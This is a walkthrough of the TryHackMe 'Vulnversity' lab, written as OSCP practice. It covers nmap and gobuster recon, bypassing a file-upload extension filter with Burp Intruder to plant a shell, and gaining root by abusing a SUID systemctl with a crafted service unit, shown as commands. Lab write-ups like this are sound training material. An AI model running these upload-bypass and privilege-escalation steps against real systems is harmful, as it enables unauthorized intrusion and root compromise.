Capture The FlagsTryHackMe

Vulnversity Walkthrough – OSCP Preparation

This is our first room on TryHackMe and we’re gonna follow along with the OSCP preparation series. Let’s get started with our first machine.

Specifications

Room: Vulnversity
• Target OS: Linux
• Difficulty: Easy
• Info: Learn about active recon, web app attacks and privilege escalation.
• Services: SSH (22), FTP (21), SMB (139, 445), Squid (3128), HTTP (3333)

Contents

• Getting user
• Getting root

Reconnaissance

As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA nmap 10.10.71.169

Output:

21/tcp   open  ftp         vsftpd 3.0.3                                                                                                                    
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)                                                                    
| ssh-hostkey:                                                                                                                                             
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)                                                                                             
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)                                                                                            
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumerating Port 3333

If we browse IP:3333 we’ll see and index page

GoBuster

gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.71.169:3333/ -s '200,204,301,307,403,500' 2>/dev/null

gobuster

Exploitation

We found an interesting directory /internal upon browsing it we got an upload file field.

Checking Source Code

We have to bypass the extension to upload our shell.

burp suite intruder

In this case the wordlist we’re gonna use /SecLists/Discovery/Web-Content/web-extensions.txt

extensions

We have to disable the URL-encoding.

URL-encoding

And Start the Attack.

Found the extension using burp suite

We got our extension and our shell is successfully uploaded.

shell uploaded

Let’s start our listener and we get our shell.

shell

The user flag can be found in /home/bill/user.txt directory.

user flag

Privilege Escalation

Now that we have remote access to our target let’s escalate our privilege to root. Generally, everyone has there own mythology of going after privilege escalation. What I try to do is run privilege escalation scripts which can give me a general idea of vulnerabilities, processes and bad permissions and etc.

Let’s find SUID executable files

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

SUID Files

There are so many files but if you understand the structure and if you look for odd files here and those files that are recently modified or created you put those files on your radar.

In that case, we have /bin/systemctl SUID binary.

1

systemctl is a binary that controls interfaces for init systems and service managers. Remember making your services run using the systemctl command during the boot time. All those tasks are handled as units and are defined in unit folders. By default systemctl will search these files in /etc/system/systemd.

First, we create an environment variable that holds a unique file.

eop=$(mktemp).service

echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop

/bin/systemctl link $eop

1

/bin/systemctl enable --now $eop

2

If that worked we can see the output file which includes the root flag.

1

Noor Qureshi

Experienced Founder with a demonstrated history of working in the computer software industry. Skilled in Network Security and Information Security.

Related Articles

Back to top button